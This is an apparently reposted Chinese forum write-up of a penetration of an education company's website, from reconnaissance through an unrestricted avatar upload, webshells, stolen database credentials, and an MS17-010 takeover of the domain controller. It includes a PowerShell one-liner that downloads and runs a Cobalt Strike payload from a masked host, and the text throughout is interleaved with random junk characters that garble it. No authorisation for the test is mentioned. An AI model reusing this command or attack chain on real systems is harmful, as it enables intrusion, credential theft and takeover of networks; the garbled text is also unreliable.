6 [+ @& K3 |8 `; g
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
9 N* d+ V3 U7 s& b ( \' H. d5 L% X( Q9 O7 ^1 L
/ u9 O1 S( }2 X! v* a
7 f, h {# m$ Q
% S1 U' n# L5 P. B, P1 _# P: O" F! r& f4 r! F% t w
正文$ h1 \9 t" ]* X% a9 ~/ q; b' v
. @/ ?1 P1 J4 f1 W; H8 l, Z5 I; J6 [. z) z% i
# c1 ]/ ~' n! I8 b. E/ J' E4 E # S) Q# ~6 e. m& B E9 w
9 K: r4 P6 L8 ~1 U) \ 目标:www.xxxx.com(一家教育机构)
. {- h6 Z8 X" B( _打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能; X3 ^# z* i, {. j' C' }
0 |: ] a4 G* x$ u
- g; P. S1 @! K# l. G9 ]+ e/ j - n/ ^0 {& w( Y" `: A7 W
" a+ z/ u9 T: v# X. t
9 t4 _" q+ P; s) d$ ?4 \
进行了简单的信息搜集 1 Y- \( z$ a( J( q
* `8 @$ ^- `1 s# e* v- a, l3 b4 a% n3 V) K5 C$ T" V4 Z. c4 J1 \$ X6 L
) i' u0 J; S0 b% n/ _4 L( f( a
+ Q! v. w3 Z7 E' p 子域名搜集
3 m+ ]9 p1 R& _: K4 D' h - K- p K$ p! a7 t
5 w x% Z) G6 S% h r5 Z5 x
# H( b6 _4 }3 f$ r
5 p5 i9 k* m; W. _, X3 u; i0 p' g. w- b$ ]( Z# ^7 j& {* Q L! @
fofa找资产
7 O0 u7 g& {3 O' c# l, c, i
" S; f9 z1 [7 O7 U4 r+ ^, S
7 d: B/ O3 O! f" P; @; y
, O: x4 `! ~" J( {0 O+ a) _- N( i# e& I5 H- v0 o
) h3 t" ^/ n2 F4 y
. s: `/ c0 v# s0 [9 N4 l6 k4 P5 \# C7 Z6 \9 n8 u9 Y% l
一共七个资产。去重之后只有两个。
* m9 T9 h6 l- c4 N" H6 a
! [7 Q* l1 {# X6 t7 |/ N% A' d8 G0 V% {# M) B% `
* g2 P% D7 x$ I2 f8 `: t7 X/ B
) _, R3 w/ q! X+ e5 _ 目录探测8 s& [# p3 m% R* B# a* F K( q
" i$ f& U6 C( c& ^+ R- ~6 P0 m
6 b% v/ t- K3 ^4 H& m. ~3 X$ @
# D6 S- V: t1 |0 y
6 D5 c2 o; j2 t0 i8 G/ x
! x U+ e2 V9 n, t! n 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 - g2 p: T8 S; b# v
- d, r0 }& Y8 N
7 V* ]3 h n$ X7 p; \
- N- a$ P" X, ]# }( v$ `4 \, n4 Z5 x0 t+ J
我又尝试了通过修改返回包来绕过登录界面
2 x: Y {% o" R# w
7 }! S& v( }1 s* ^2 m
; ?2 J3 R) K& @9 A - o8 m- B) E1 X% x
) T! ?0 ^: u2 {+ U9 D9 }( k0 j p4 j; j
3 R" x; \ Q3 @, k 还是不行,尝试注入无果
7 M" S, {" x5 c: f# V4 K * q- G; K3 N: k) x- l
" r# Q+ a: E" t4 y8 Q; t
0 L" K/ y- @ N9 S4 T6 Z# }# x5 V
. B2 U7 B& t) }) \5 b2 T+ G) t; R
3 z0 c; a3 E% u9 x/ O0 Y 不过我目录探测出了一处Spring信息泄露 8 f; n" I& {, V9 C2 c5 p" M
: F1 A, h& S9 h, J- U$ Y" O( Z# H1 m* i$ w) ?
5 i6 F: D; p8 g- h" \
3 c4 \; k2 o9 _( u* a) F+ N 8 b$ u2 ^6 {3 w% X7 c
, O- c0 y* B( M! A2 a' A
! ?# b* m) P& ]% C
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录) U4 F% R4 Q5 P8 m: X" E9 R
1 _3 O# f: }, Q; F- q* r( `9 v
" O3 p" B" Q O9 Q! h1 B- z7 |+ _ ! J6 h5 D$ P P$ w
( Y% x8 W/ J h# O4 _% O
1 }9 ~3 J7 Y% `+ S 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
* G8 P$ a2 {4 _! g" c7 v ( T c- X! m7 r1 U" y
" c, B/ W) d# i# [) g
% f! F: C8 B& A- ]# T1 f) s) u
# e E, r/ k( z9 ^: H4 N( Y8 |- F7 }$ Q. h
获取有些师傅到这一步就手机抓包电脑测了。
; [# e5 ?/ T) D: x2 l- _
8 w; x6 q7 s! x2 w. s1 ~$ g5 L
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
; Y8 H) U/ k4 J! H
; Y. w0 z8 g6 M5 g! |' }& b
0 y& O, [, C2 A5 \ 其中在一个公众号发现了小程序,可以进行注册。3 L6 C, m2 m; X6 l" P& z: H% o# ^+ k
3 D* W( d/ [7 V8 R+ D
1 u& K! o; `2 u; g+ m1 v 看到了头像上传,尝试上传获取WebShell, j2 p! ]; s, z% T
, g# s# J1 |, Q1 ?4 l5 t J* T' L/ E; i; U C% f
; @# C4 L" \2 } [# T$ \
8 {9 d; e! X2 R: H+ [- [5 B2 ~) Y! M! P
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
1 m, E. x% Z- k8 S
5 R( @, q) a8 Z. ^: W& n$ u# w) ~! S, A8 j3 V
' [+ v$ F0 n B A0 E# z: | 1 Q9 r6 a# Z1 ?- w& u) Z
0 A% v3 M$ Z( F) Z 然后上了大马& c; n4 o( ]2 z g' v/ y
. b/ T. D: L( \0 s
' N: B1 k- J6 g2 I1 z) B. ` ; U S- ]( S2 q( Q
# ~' D1 u7 z! Y
$ [+ Q f5 i6 d" M8 u0 m- a. q
5 Y f: @7 L; e4 A8 E
0 h4 l$ e! o2 W6 z
7 H% [ e5 p7 A5 h. D
通过翻找文件发现数据库账号密码7 s2 Q5 \$ M7 L/ v( m3 D
6 D8 }6 u4 r( M$ ~3 l% r# X9 k. @( ]$ U$ a. r# E& i3 }! p( H2 H
0 d2 @% K- k( a+ f
! e5 r* y5 l. p4 \: p# F+ B7 B, L C" [& X% _) ~& D9 v) t* S
--内网渗透* x7 G! i) B& ~. B8 C
: `% z) t. M& m; u7 A: p! ]+ v' t& A) x
直接通过powershell执行 cs上线5 O6 P9 o; G% e# }
6 Z6 Y' x0 [' G: v2 ?. L
* Q* e' h! b* n5 K( F, k
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"! N& G l/ d% P& Q2 B
" O' T& n- j/ a7 ]
! V- A; N1 Q) F8 i
, G6 L* `- l- M! L" C4 @3 p' Z' h
" y* n. N( P5 C U" K0 [7 ]: v) d5 u S, B5 L2 b
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
- T5 ~4 ~. q) W 4 B/ G7 {* X* P. u" T
8 J, C8 Z! a* Q6 S) [* t + S2 i# V2 n* Y7 ~1 ?, s
: `4 h/ G+ s3 T2 J
) U. v) C. D9 N6 I* b 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 9 t0 n; h5 ?- \/ h' W
7 q# N/ m! z+ V, h
v& S# f! T9 B3 \9 O+ [. n
2 w% W e3 N1 \* L/ Z
) A" A$ [9 B1 p4 @. L8 F
7 k% r5 O+ ^ S! }2 w: K4 i
& R9 O' W/ V$ P$ J0 L6 A7 }* h/ S: _
" L6 F4 r( L# Z9 |. I; f- B* G1 p; y9 b. Z" s; H
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 R3 E3 X J8 O
3 m, m% j& U. ]5 J
% H9 b7 ]7 ?' I, T! N p: ?6 M6 t6 ?/ {, o0 c
2 ~% |5 i5 [7 X% D
6 K. Q2 D, |* i
/ ]% i* s; |; T* ^; u* ~! h& b8 _; J8 f
' S( v0 u0 z& I
" l# Q4 Q! w7 Z+ N( i9 j6 J/ u. {, T( G+ B6 G
( H8 ^8 H' v. q3 n. \# |! ^) x
5 P' i3 X( X5 R V0 w
- y* l- V( A7 }* j5 x5 e
$ e( v8 t3 p$ u2 N' Z% M* S0 M
$ C Y3 e4 M8 f1 Y8 {1 i- E 小结
! a1 g6 e* G' l5 R9 H3 g- N- o
# [3 G. g# W' w( L4 n8 [ O ?5 v, j1 l0 K
0 Y6 @1 G3 {) c0 t# q* H. E; @
1 g) P: m& f/ n S$ W, d1 E+ X
8 W4 j& R4 {5 g0 S
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!$ C! N, ~ ^4 O e: q6 r0 I
2 z% t. |6 \- w% |8 P8 n
; m/ _4 z, i" p$ c G/ f
' y9 I$ t2 y s! c' W
K" f9 {8 ^ T6 `3 @+ X6 o+ E7 D$ {2 h! l/ O
-
9 B n% }1 \+ [6 b0 n
$ }( u' Q" V) l
: e* v2 ?0 v8 O6 L
-
; o7 `# I& ^# [% D- c v) \
$ V( [6 S* w- S# _6 t* E0 `
& v! a9 u- A5 C6 S! o
; h# ^! r1 ?% M
, p1 x, E7 L( x- Z" f; ]
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html& A" H) ?* i. S+ q4 v8 E1 V
5 S: ?( r! u L
! a. y8 Q" h% a+ h( U
3 w6 H2 ~; X/ i G |